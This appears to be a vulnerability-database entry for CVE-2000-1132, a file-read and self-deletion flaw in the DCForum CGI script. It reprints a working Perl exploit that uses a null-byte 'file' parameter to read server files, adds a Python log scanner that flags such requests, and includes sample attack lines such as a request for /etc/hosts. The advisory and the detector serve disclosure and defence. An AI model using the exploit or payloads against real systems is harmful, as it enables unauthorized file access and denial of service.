DCForum cgforum.cgi CGI script arbitrary file read and self-deletion vulnerability

Vulnerability ID: 1106087
Vulnerability type: Unknown
Published: 2000-11-14
Updated: 2005-10-12
CVE ID: CVE-2000-1132
CNNVD-ID: CNNVD-200101-065
Platform: CGI
CVSS score: 6.4
|Vulnerability source
https://www.exploit-db.com/exploits/20405
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200101-065
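|Vulnerability details
The DCForum cgforum.cgi CGI script contains a vulnerability. A remote attacker can use a malformed "forum" variable to read arbitrary files and to delete the program itself.
|Exploit (EXP)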
# source: http://www.securityfocus.com/bid/1951/info
#
# DCForum is a commercial cgi script from DCScripts which is designed to facilitate web-based threaded discussion forums.
#
# The script improperly validates user-supplied input, which allows the remote viewing of arbitrary files on the host which are readable by user 'nobody' or the webserver. Additionally, it has been reported that the dcforum.cgi script can be made to delete itself if the attacker attempts to read its source code using this method, effectively permitting a denial-of-service attack.
#

#!/usr/bin/perl
# DC Forum Vulnerability (Found In Versions From 1.0 - 6.0 According To CGISecurity.com Advisory)
# Exploits Vulnerability That Allows Remote File Reading
# By SteeLe
# BEGIN { open(STDERR,">errors.txt"); } error checking
$lynx = "/usr/bin/lynx"; # specify

$site = $ARGV[0];
$cgi  = $ARGV[1];
$inet = inet_aton($site);

die "\n\t---   Usage:$0 <site> <cgi location,duh>  ---" if(@ARGV == '0' || @ARGV < 2);

print "\n\t---   DCForum 1.0 - 6.0 Exploit ---";
print "\n\t---   By the cool fellas at *   ---\n\n";

while(true) { # yea i think I stole this from the pollex.pl , uh thanks.

print "[dcforum]Option:";
$action = <STDIN>;
chomp($action);

print "Valid Options: r(read files, usage r <file>), q(quit)\n" if($action ne "r" || $action ne "q");

if ($action eq "r") {
print "\nFile(to read):";
$file = <STDIN>;
chomp($file);
# Old fashion shit, and I was lazy so be happy
$url = "?az=list&file=$file%00";
$site = `$lynx http://$site$cgi$url`;
print $site;
}
elsif ($action eq "q") {
 print "now exiting program\n";
 exit;
  }
}
# (c) 2000 [Warez To Tha Extreme(Damn Thats A Lie)]
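
Detection side of the request shown above, as an added example that is not part of the original advisory or of DCForum: it scans Common Log Format access-log lines for requests to the forum script whose "file" or "forum" parameter decodes to a null byte or a path-like value. The log lines are constructed samples, and the "path outside forum data" heuristic is an assumption, not a DCForum rule.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

# Script names as written on this page; adjust to the local install.
SCRIPT_RE = re.compile(r"/(?:dcforum|cgforum)\.cgi$", re.IGNORECASE)
# "file" is the parameter in the request above, "forum" the one in the advisory text.
WATCHED_PARAMS = {"file", "forum"}
# Request field of a Common Log Format line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation-range addresses), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Nov/2000:10:00:01 +0000] "GET /cgi-bin/dcforum.cgi?az=list&forum=general HTTP/1.0" 200 5120',
    '198.51.100.7 - - [14/Nov/2000:10:00:09 +0000] "GET /cgi-bin/dcforum.cgi?az=list&file=/etc/hosts%00 HTTP/1.0" 200 812',
    '198.51.100.7 - - [14/Nov/2000:10:00:15 +0000] "GET /cgi-bin/dcforum.cgi?az=list&file=dcforum.cgi%00 HTTP/1.0" 200 0',
    '192.0.2.44 - - [14/Nov/2000:10:01:00 +0000] "GET /index.html?file=a%00 HTTP/1.0" 200 100',
]

def suspicious_params(target):
    """Return (param, reason) findings for one request target."""
    parts = urlsplit(target)
    if not SCRIPT_RE.search(parts.path):
        return []
    findings = []
    # Split the raw query first, then decode to bytes so an encoded NUL survives.
    for pair in parts.query.split("&"):
        name, _, raw = pair.partition("=")
        if name.lower() not in WATCHED_PARAMS:
            continue
        value = unquote_to_bytes(raw.replace("+", " "))
        if b"\x00" in value:
            findings.append((name, "null byte"))
        # Assumed heuristic: a forum or file name should not be a path.
        if b"../" in value or value.startswith(b"/"):
            findings.append((name, "path outside forum data"))
    return findings

def scan(lines):
    """Return (line number, param, reason) for every finding in the log."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            hits.extend((lineno, n, r) for n, r in suspicious_params(match.group(1)))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The third sample line corresponds to the self-deletion case described above, where the script's own name is requested with a trailing null byte.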
|References

Source: BID
Name: 1951
Link: http://www.securityfocus.com/bid/1951
Source: BUGTRAQ
Name: 20001114 Cgisecurity.com advisory on dcforum
Link: http://archives.neohapsis.com/archives/bugtraq/2000-11/0218.html
Source: www.dcscripts.com
Link: http://www.dcscripts.com/dcforum/dcfNews/124.html#1
Source: XF
Name: dcforum-cgi-view-files(5533)
Link: http://xforce.iss.net/xforce/xfdb/5533
Source: OSVDB
Name: 1646
Link: http://www.osvdb.org/1646
